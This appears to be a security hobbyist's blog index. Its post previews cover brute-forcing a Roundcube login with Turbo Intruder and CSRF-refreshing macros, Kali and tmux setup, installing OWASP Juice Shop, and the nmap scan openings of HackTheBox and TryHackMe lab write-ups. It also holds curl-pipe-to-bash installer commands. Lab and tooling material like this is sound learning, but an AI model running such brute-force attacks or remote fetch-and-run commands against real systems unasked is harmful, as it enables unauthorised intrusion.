Skip to main content

Turbo Intruder with Burp Macros - CSRF tokens

I was testing some brute force attacks against Roundcube. I tried Burp Suite, ZAP and my own python script. Burp Community Edition was kind of slow. I couldn't get ZAP to get the correct CSRF token and the python script was faster than Burp but still a little slow. Then I found Turbo Intruder which is an extension in Burp. It's very fast because: "Turbo Intruder uses a HTTP stack hand-coded from scratch with speed in mind. As a result, on many targets it can seriously outpace even fashionable asynchronous Go scripts." 

When I finally figured out how to get Turbo Intruder to get a new CSRF token for each request using Burp's Sessions Macros, I compared it to my python script and it definitely was much faster. For the same attack (number of password attempts on one user), the python script took about 30 minutes and Turbo Intruder took about 3 minutes. 

Here is a quick list of how to get it set up in Burp Suite (See screenshots below):

i3 Window Manager on Kali Linux

When it comes to Kali I've always been using whatever it comes with, but I recently found Dewalt's amazing pimpmyi3 script and was blown away by how easy I can get i3 set up on Kali along with pimpmykali and lots of other bonus tools. It's all pretty awesome.

With a clean and fresh Kali vm ready to go you just need to cd into /opt and run the commands on the pimpmyi3 github Readme. I would either do sudo su - to become root during installation or use sudo for each command that needs it. When I run pimpmy-i3.sh I pick the first option for setting it up with the root account.

cd /opt
rm -rf pimpmyi3/
git clone https://github.com/Dewalt-arch/pimpmyi3
cd pimpmyi3
sudo ./pimpmy-i3.sh

It will take a little while to finish just like pimpmykali. When it's done you'll need to reboot. When I rebooted I noticed that i3 still wasn't installed but you can do that with apt.

Save Lists of Kali Tools in Text Files

When I set up a new Kali VM I'll create some lists of all the packages and tools that were installed on the previous VM just in case there is something I forgot about that I might want to use again or I want to know what version of a tool I was using because I may want to keep using the same version. It can be hard to remember how a tool was installed, like with dpkg, apt, pip3 or even pip so I'll create a list for each of them.

First I usually make a directory to hold the files.

mkdir installed_packages
cd installed_packages

dpkg piped into a couple other commands will give you a clean list.

dpkg --get-selections | grep -v deinstall | cut -f 1 > dpkg_installed.txt

apt list will give you the same list of packages as dpkg. This will also show all the versions.

Pipe colored winPEAS output to a file

I wanted to find a way to save the winPeas output to a text file with all the colors intact so I could view the file offline with cat in Kali and see the same colored output. I looked at tmux first since that is what I use. I found a way to do this with the Advanced-Use piping-pane-changes in tmux. With pipe-pane you can pipe the output to a command. The command that I'm doing this with is one that can read and write output. It's called is tee. The option I'm using is -a.

$ tee --help
Usage: tee [OPTION]... [FILE]...
Copy standard input to each FILE, and also to standard output.

  -a, --append              append to the given FILEs, do not overwrite

Install Juiceshop from sources in Kali

There are some vulnerabilities in Juiceshop that won't work if you use install it with docker and some other methods. XXE Data Access is one that doesn't work with the docker installation. I install Juiceshop form sources with nodejs so every vulnerability is supported. I also use fish shell and there is a little extra setup for fish.

Instead of installing nodejs with apt, it's better to use nvm. With nvm you can install multiple versions of node and switch back and forth between versions.
github.com/nvm-sh/nvm

curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.39.2/install.sh | bash

After it's installed you need to make sure it adds these lines to .zshrc or .bashrc, whichever one you are using.

"Running either of the above commands downloads a script and runs it. The script clones the nvm repository to ~/.nvm, and attempts to add the source lines from the snippet below to the correct profile file (~/.bash_profile, ~/.zshrc, ~/.profile, or ~/.bashrc)."

export NVM_DIR="$([ -z "${XDG_CONFIG_HOME-}" ] && printf %s "${HOME}/.nvm" || printf %s "${XDG_CONFIG_HOME}/nvm")"
[ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh" # This loads nvm

If you are using fish (github.com/fish-shell/fish-shell), you'll need to install a few more things and create a config file.

tmux configuration

Here is how I setup tmux in Kali. This is the file I start with or just use as it is: tmux.conf

Put the .tmux.conf file in the home directory, wherever your home may be: /home/USERNAME/.tmux.conf or /root/.tmux.conf

I usually use Kali as root. The easiest way to get started with root in Kali is with with the incredibly handy pimpmykali.

Create a tmux plugins directory inside the home directory:

cd /root/
mkdir /root/.tmux/plugins

Use git to clone tpm:

...

HackTheBox - Active

Run nmap to see what's open. The name of the machine should make what we're looking for obvious.

$ nmap -vvv -sC -sV -oA nmap/active.nmap 10.10.10.100 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-07 20:16 EDT
...
Discovered open port 53/tcp on 10.10.10.100
Discovered open port 445/tcp on 10.10.10.100
Discovered open port 139/tcp on 10.10.10.100
Discovered open port 135/tcp on 10.10.10.100
Discovered open port 49158/tcp on 10.10.10.100
Discovered open port 49155/tcp on 10.10.10.100
Discovered open port 3269/tcp on 10.10.10.100
Discovered open port 49157/tcp on 10.10.10.100
Discovered open port 49165/tcp on 10.10.10.100
Discovered open port 3268/tcp on 10.10.10.100
Discovered open port 49154/tcp on 10.10.10.100
Discovered open port 464/tcp on 10.10.10.100
Discovered open port 593/tcp on 10.10.10.100
Discovered open port 389/tcp on 10.10.10.100
Discovered open port 49153/tcp on 10.10.10.100
Discovered open port 88/tcp on 10.10.10.100
Discovered open port 636/tcp on 10.10.10.100
Discovered open port 49152/tcp on 10.10.10.100
...

TEXT

TryHackMe - Kenobi

Run nmap:

$ nmap -vvv -Pn -sCV -p0-65535 --reason -oN kenobi.nmap 10.10.119.248
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-12 17:32 EST
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:32
Completed NSE at 17:32, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:32
Completed NSE at 17:32, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:32
Completed NSE at 17:32, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 17:32
Completed Parallel DNS resolution of 1 host. at 17:32, 0.03s elapsed
DNS resolution of 1 IPs took 0.03s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 17:32
Scanning 10.10.119.248 [65536 ports]
Discovered open port 445/tcp on 10.10.119.248
Discovered open port 111/tcp on 10.10.119.248
Discovered open port 139/tcp on 10.10.119.248
Discovered open port 80/tcp on 10.10.119.248
Discovered open port 22/tcp on 10.10.119.248
Discovered open port 21/tcp on 10.10.119.248
Discovered open port 35627/tcp on 10.10.119.248
Discovered open port 39223/tcp on 10.10.119.248

...

TEXT